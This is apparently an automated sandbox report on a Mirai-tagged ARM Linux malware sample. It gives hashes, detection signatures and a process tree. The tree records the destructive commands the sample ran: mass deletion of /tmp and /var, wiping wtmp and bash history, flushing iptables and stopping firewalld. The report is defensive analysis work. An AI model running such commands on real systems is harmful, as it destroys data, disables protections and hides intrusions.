Linux Analysis Report arm7

Overview

General Information

Sample Name: arm7
Analysis ID: 519695
MD5: 9fc0975479e319f970c96eded3c2d001
SHA1: ff77399d8fb757636a3eae4909dbc33f4a00f09e
SHA256: f0c7eb51c588fa50e39bee022ea2c4f602842012b01f2ee025b91eb5eb50782f
Tags: Mirai

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill many processes (SIGKILL)
Deletes all firewall rules
Connects to many ports of the same IP (likely port scanning)
Sample deletes itself
Sample is packed with UPX
Uses known network protocols on non-standard ports
Deletes security-related log files
Sample reads /proc/mounts (often used for finding a writable filesystem)
Executes the "kill" or "pkill" command typically used to terminate processes
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Executes the "iptables" command used for managing IP filtering and manipulation
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories

Analysis Advice

None of the HTTP servers contacted by the sample answer. The sample is likely an old dropper that no longer works
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures
Static ELF header machine description suggests that the sample might not execute correctly on this machine

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 519695
Start date: 11.11.2021
Start time: 03:07:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 7s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: arm7
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal100.spre.troj.evad.lin@0/9@2/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown
  • TCP Packets have been reduced to 100
  • Report size exceeded maximum capacity and may have missing network information.

Process Tree

  • system is lnxubuntu20
  • arm7 (PID: 5234, Parent: 5112, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm7
    • arm7 New Fork (PID: 5236, Parent: 5234)
    • arm7 New Fork (PID: 5237, Parent: 5234)
    • arm7 New Fork (PID: 5239, Parent: 5234)
    • arm7 New Fork (PID: 5240, Parent: 5234)
    • arm7 New Fork (PID: 5241, Parent: 5234)
    • arm7 New Fork (PID: 5245, Parent: 5234)
      • arm7 New Fork (PID: 5249, Parent: 5245)
      • arm7 New Fork (PID: 5251, Parent: 5245)
        • arm7 New Fork (PID: 5253, Parent: 5251)
          • arm7 New Fork (PID: 5255, Parent: 5253)
          • sh (PID: 5255, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
            • sh New Fork (PID: 5257, Parent: 5255)
            • rm (PID: 5257, Parent: 5255, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/arm7 /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te 
/var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
          • arm7 New Fork (PID: 5262, Parent: 5253)
          • sh (PID: 5262, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /var/log/wtmp"
            • sh New Fork (PID: 5268, Parent: 5262)
            • rm (PID: 5268, Parent: 5262, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /var/log/wtmp
          • arm7 New Fork (PID: 5269, Parent: 5253)
          • sh (PID: 5269, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /tmp/*"
            • sh New Fork (PID: 5271, Parent: 5269)
            • rm (PID: 5271, Parent: 5269, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/*
          • arm7 New Fork (PID: 5272, Parent: 5253)
          • sh (PID: 5272, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf /bin/netstat"
            • sh New Fork (PID: 5274, Parent: 5272)
            • rm (PID: 5274, Parent: 5272, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /bin/netstat
          • arm7 New Fork (PID: 5275, Parent: 5253)
          • sh (PID: 5275, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "iptables -F"
            • sh New Fork (PID: 5277, Parent: 5275)
            • iptables (PID: 5277, Parent: 5275, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
          • arm7 New Fork (PID: 5281, Parent: 5253)
          • sh (PID: 5281, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 busybox"
            • sh New Fork (PID: 5284, Parent: 5281)
            • pkill (PID: 5284, Parent: 5281, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 busybox
          • arm7 New Fork (PID: 5287, Parent: 5253)
          • sh (PID: 5287, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 perl"
            • sh New Fork (PID: 5289, Parent: 5287)
            • pkill (PID: 5289, Parent: 5287, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 perl
          • arm7 New Fork (PID: 5292, Parent: 5253)
          • sh (PID: 5292, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "pkill -9 python"
            • sh New Fork (PID: 5294, Parent: 5292)
            • pkill (PID: 5294, Parent: 5292, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill -9 python
          • arm7 New Fork (PID: 5295, Parent: 5253)
          • sh (PID: 5295, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "service iptables stop"
            • sh New Fork (PID: 5297, Parent: 5295)
            • service (PID: 5297, Parent: 5295, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service iptables stop
              • service New Fork (PID: 5299, Parent: 5297)
              • basename (PID: 5299, Parent: 5297, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5300, Parent: 5297)
              • basename (PID: 5300, Parent: 5297, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5301, Parent: 5297)
              • systemctl (PID: 5301, Parent: 5297, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
              • service New Fork (PID: 5302, Parent: 5297)
                • service New Fork (PID: 5303, Parent: 5302)
                • systemctl (PID: 5303, Parent: 5302, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                • service New Fork (PID: 5304, Parent: 5302)
                • sed (PID: 5304, Parent: 5302, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • systemctl (PID: 5297, Parent: 5295, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop iptables.service
          • arm7 New Fork (PID: 5308, Parent: 5253)
          • sh (PID: 5308, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
            • sh New Fork (PID: 5310, Parent: 5308)
            • iptables (PID: 5310, Parent: 5308, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -F
            • sh New Fork (PID: 5311, Parent: 5308)
            • iptables (PID: 5311, Parent: 5308, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: /sbin/iptables -X
          • arm7 New Fork (PID: 5312, Parent: 5253)
          • sh (PID: 5312, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "service firewalld stop"
            • sh New Fork (PID: 5314, Parent: 5312)
            • service (PID: 5314, Parent: 5312, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service firewalld stop
              • service New Fork (PID: 5315, Parent: 5314)
              • basename (PID: 5315, Parent: 5314, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5316, Parent: 5314)
              • basename (PID: 5316, Parent: 5314, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
              • service New Fork (PID: 5317, Parent: 5314)
              • systemctl (PID: 5317, Parent: 5314, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
              • service New Fork (PID: 5318, Parent: 5314)
                • service New Fork (PID: 5319, Parent: 5318)
                • systemctl (PID: 5319, Parent: 5318, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
                • service New Fork (PID: 5320, Parent: 5318)
                • sed (PID: 5320, Parent: 5318, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
            • systemctl (PID: 5314, Parent: 5312, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop firewalld.service
          • arm7 New Fork (PID: 5323, Parent: 5253)
          • sh (PID: 5323, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "rm -rf ~/.bash_history"
            • sh New Fork (PID: 5325, Parent: 5323)
            • rm (PID: 5325, Parent: 5323, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /root/.bash_history
          • arm7 New Fork (PID: 5326, Parent: 5253)
          • sh (PID: 5326, Parent: 5253, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "history -c"
  • systemd New Fork (PID: 5355, Parent: 1)
  • whoopsie (PID: 5355, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5364, Parent: 1)
  • sshd (PID: 5364, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5365, Parent: 1)
  • sshd (PID: 5365, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • gdm3 New Fork (PID: 5370, Parent: 1320)
  • Default (PID: 5370, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5373, Parent: 1320)
  • Default (PID: 5373, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5374, Parent: 1)
  • accounts-daemon (PID: 5374, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
  • systemd New Fork (PID: 5403, Parent: 1860)
  • pulseaudio (PID: 5403, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5428, Parent: 1)
  • gpu-manager (PID: 5428, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5429, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5430, Parent: 5429)
      • grep (PID: 5430, Parent: 5429, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5431, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5432, Parent: 5431)
      • grep (PID: 5432, Parent: 5431, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5433, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5434, Parent: 5433)
      • grep (PID: 5434, Parent: 5433, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5435, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5436, Parent: 5435)
      • grep (PID: 5436, Parent: 5435, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5437, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5438, Parent: 5437)
      • grep (PID: 5438, Parent: 5437, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5439, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5440, Parent: 5439)
      • grep (PID: 5440, Parent: 5439, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5441, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5442, Parent: 5441)
      • grep (PID: 5442, Parent: 5441, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5443, Parent: 5428, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5444, Parent: 5443)
      • grep (PID: 5444, Parent: 5443, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5445, Parent: 1)
  • generate-config (PID: 5445, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5446, Parent: 5445, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5452, Parent: 1)
  • gdm-wait-for-drm (PID: 5452, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • fusermount (PID: 5456, Parent: 2038, MD5: 576a1b135c82bdcbc97a91acea900566) Arguments: fusermount -u -q -z -- /run/user/1000/gvfs
  • systemd New Fork (PID: 5476, Parent: 1)
  • systemd-user-runtime-dir (PID: 5476, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 1000
  • systemd New Fork (PID: 5500, Parent: 1)
  • gdm3 (PID: 5500, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • systemd New Fork (PID: 5550, Parent: 1)
  • gpu-manager (PID: 5550, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5551, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5552, Parent: 5551)
      • grep (PID: 5552, Parent: 5551, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5553, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5554, Parent: 5553)
      • grep (PID: 5554, Parent: 5553, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5555, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5556, Parent: 5555)
      • grep (PID: 5556, Parent: 5555, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5557, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5558, Parent: 5557)
      • grep (PID: 5558, Parent: 5557, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5559, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5560, Parent: 5559)
      • grep (PID: 5560, Parent: 5559, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5561, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5562, Parent: 5561)
      • grep (PID: 5562, Parent: 5561, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5563, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5564, Parent: 5563)
      • grep (PID: 5564, Parent: 5563, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5565, Parent: 5550, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5566, Parent: 5565)
      • grep (PID: 5566, Parent: 5565, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5567, Parent: 1)
  • generate-config (PID: 5567, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5568, Parent: 5567, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5569, Parent: 1)
  • gdm-wait-for-drm (PID: 5569, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5579, Parent: 1)
  • gdm3 (PID: 5579, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
arm7 | SUSP_ELF_LNX_UPX_Compressed_File | Detects a suspicious ELF binary with UPX compression | Florian Roth
  • 0xde2c:$s1: PROT_EXEC|PROT_WRITE failed.
  • 0xde9b:$s2: $Id: UPX
  • 0xde4c:$s3: $Info: This file is packed with the UPX executable packer

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Mirai_12 | Yara detected Mirai | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
